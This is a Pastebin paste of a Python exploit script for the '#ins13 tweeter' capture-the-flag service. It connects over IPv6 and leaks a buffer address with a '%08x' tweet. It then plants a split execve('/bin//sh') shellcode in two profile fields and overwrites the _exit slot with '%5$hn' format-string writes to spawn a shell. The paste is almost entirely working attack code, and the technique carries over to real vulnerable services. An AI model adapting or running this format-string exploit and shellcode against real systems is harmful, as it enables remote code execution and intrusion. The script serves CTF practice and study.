#ins13 tweeter

a guest
Mar 23rd, 2013
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
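# -*- coding: utf-8 -*-
"""Exploit script for the "#ins13 tweeter" challenge.

Attack outline, one request/reply exchange per step (the menu numbers,
field order and argument index come straight from the original script and
are specific to the challenge binary):

1. Connect over IPv6, read the banner, register the nick ``jojo``.
2. Choose menu item 2 (tweet) and post ``%08x``: the reply leaks a stack
   word, which the original author takes to be the address of the buffer
   that later holds the profile.
3. Choose menu item 1 (edit profile) and fill nick / website / status.  The
   nick gets the first 17 bytes of an execve("/bin//sh") shellcode plus a
   ``jmp +1`` (``eb 01``), the website gets the remaining 6 bytes, so the
   two fields chain into one payload.  The original notes the first part
   must be shorter than 20 bytes.
4. Post two more tweets of the form ``aa<slot>%<pad>c%5$hn`` so that the
   two 16-bit halves of the ``_exit`` slot are overwritten with the leaked
   buffer address.
5. Choose menu item 3, which ends up calling ``_exit`` and therefore the
   shellcode.

Caveat from the original comments: the author says a bind shell would be
more appropriate here but ships a plain execve("/bin//sh"); that only yields
a usable shell if the service's stdin/stdout are the client socket (e.g. an
inetd-style setup).  This script reads one reply after step 5 and closes,
exactly as the original did.

Runs under Python 2.7 and Python 3 (all wire data is ``bytes``).
"""
from __future__ import print_function

import re
import socket
import struct
from contextlib import closing

__all__ = [
    "main",
    "parse_leaked_addr",
    "fmt_short_write",
    "recv_show",
    "SHELLCODE",
    "SC_NICK",
    "SC_WEBSITE",
]

target_ip = "serv"
target_port = 12345

# Seconds to wait on each recv()/connect(); the original blocked forever.
# Set to None to restore that behaviour.
SOCKET_TIMEOUT = 30.0

# 32-bit Linux execve("/bin//sh", ["/bin//sh", NULL], NULL):
#   xor eax,eax ; push eax ; push "//sh" ; push "/bin" ; mov ebx,esp
#   push eax ; push ebx ; mov ecx,esp ; mov al,0xb ; int 0x80
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

# Part 1 (nick field): everything up to and including ``push ebx`` (17 bytes)
# followed by ``jmp +1`` (eb 01).  The original only says the jmp "joins the
# two parts"; presumably it hops over one byte sitting between the nick and
# website fields in the profile buffer -- verify against the target binary.
SC_NICK = SHELLCODE[:17] + b"\xeb\x01"
# Part 2 (website field): mov ecx,esp ; mov al,0xb ; int 0x80
SC_WEBSITE = SHELLCODE[17:]

if len(SC_NICK) >= 20:
    # Guard for anyone who edits the shellcode: the original requires the
    # first part to fit in under 20 bytes.
    raise ValueError("first shellcode part must be shorter than 20 bytes")

# The 4-byte _exit slot in the challenge binary, written as two 16-bit
# halves (the original lists LOW = 0x8049bfc and HIGH = 0x8049bfe).
# Presumably the GOT entry for _exit; verify against the target binary.
EXIT_SLOT_LOW = 0x8049bfc
EXIT_SLOT_HIGH = EXIT_SLOT_LOW + 2

# Bytes emitted by the format-string tweet before the %c padding:
# b"aa" (2) + packed slot address (4).
FMT_PREFIX_LEN = 6

# The leaked %08x value follows the first "\n\n\n" in the reply (that is
# where the original script looked for it).
LEAK_RE = re.compile(br"\n\n\n([0-9a-fA-F]{8})")


def parse_leaked_addr(reply):
    """Return the address leaked by the ``%08x`` tweet as an int.

    ``reply`` is the raw bytes received after posting the ``%08x`` tweet.
    Raises ValueError when the ``\\n\\n\\n`` marker or the eight hex digits
    are missing; the original used ``str.find`` and, on a miss, silently
    decoded ``reply[2:10]`` as the address.
    """
    match = LEAK_RE.search(reply)
    if match is None:
        raise ValueError("no leaked address in reply: %r" % (reply,))
    # The leak is printed as big-endian hex text, so int(…, 16) is the same
    # as unhexlify + struct.unpack(">I") in the original.
    return int(match.group(1), 16)


def fmt_short_write(slot, value):
    """Build a tweet that stores the low 16 bits of ``value`` at ``slot``.

    Payload: ``b"aa" + <slot, little-endian> + b"%<pad>c%5$hn\\n"``.
    ``%5$hn`` writes the number of characters printed so far, as a short,
    through the 5th format argument, which the original author determined
    to be the slot address embedded in the tweet.  ``pad`` is chosen so that
    ``FMT_PREFIX_LEN + pad == value (mod 2**16)``.  The original used
    ``value - 6`` unwrapped, which yields a negative width (parsed by printf
    as a left-justify flag, not padding) for values below 6 and ``%0c`` for
    exactly 6.  Whether a width of up to 65536 is honoured by the target
    depends on the binary.
    """
    pad = (value - FMT_PREFIX_LEN) % 0x10000
    if pad == 0:
        # A zero width is not padding at all; print a full 65536 characters
        # so the counter still lands on ``value`` modulo 2**16.
        pad = 0x10000
    return (b"aa" + struct.pack("<I", slot)
            + b"%" + str(pad).encode("ascii") + b"c%5$hn\n")


def recv_show(sk, label):
    """Read one reply (a single recv, best effort) and echo it.

    The reply is printed with ``repr`` so a hostile or broken server cannot
    push terminal escape sequences into the operator's console.  A single
    recv() may return a partial reply; the original made the same
    one-recv-per-step assumption.
    """
    data = sk.recv(4096)
    print("[%s] %r" % (label, data))
    return data


def main(host=target_ip, port=target_port):
    """Run the full attack against ``host``:``port`` (see module docstring)."""
    sk = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    # closing() works on Python 2.7 socket objects too, and guarantees the
    # socket is released if any step raises.
    with closing(sk):
        sk.settimeout(SOCKET_TIMEOUT)
        sk.connect((host, port))
        recv_show(sk, "welcome")

        # sendall(): send() may write only part of the payload.
        sk.sendall(b"jojo\n")
        recv_show(sk, "nick")

        # Menu item 2 = tweet; the tweet itself is the %08x leak.
        sk.sendall(b"2\n")
        recv_show(sk, "tweet prompt")
        sk.sendall(b"%08x\n")
        leak = recv_show(sk, "leak")
        addr_buff = parse_leaked_addr(leak)
        print("buffer_addr = %#x" % addr_buff)

        # Menu item 1 = edit profile: nick, website, status, in that order.
        # The two shellcode parts are sent without a trailing newline so the
        # fields end exactly on the jmp / the int 0x80.
        sk.sendall(b"1\n")
        recv_show(sk, "edit profile")
        sk.sendall(SC_NICK)
        recv_show(sk, "nick sc")
        sk.sendall(SC_WEBSITE)
        recv_show(sk, "website sc")
        sk.sendall(b"AAAA\n")
        recv_show(sk, "status")

        # The original sends "2" twice here; the first one appears to answer
        # a prompt left over from the profile edit.  Kept as-is.
        sk.sendall(b"2\n")
        recv_show(sk, "tweet")
        sk.sendall(b"2\n")
        recv_show(sk, "tweet prompt")

        addr_high = addr_buff >> 16
        addr_low = addr_buff & 0xFFFF
        print("addr_high = %#x" % addr_high)
        print("addr_low = %#x" % addr_low)

        # Two independent short writes; order does not matter.
        sk.sendall(fmt_short_write(EXIT_SLOT_LOW, addr_low))
        recv_show(sk, "write low")
        sk.sendall(b"2\n")
        recv_show(sk, "tweet prompt")
        sk.sendall(fmt_short_write(EXIT_SLOT_HIGH, addr_high))
        recv_show(sk, "write high")

        print("launch shellcode -> call _exit")
        sk.sendall(b"3\n")
        recv_show(sk, "exit")


if __name__ == "__main__":
    main()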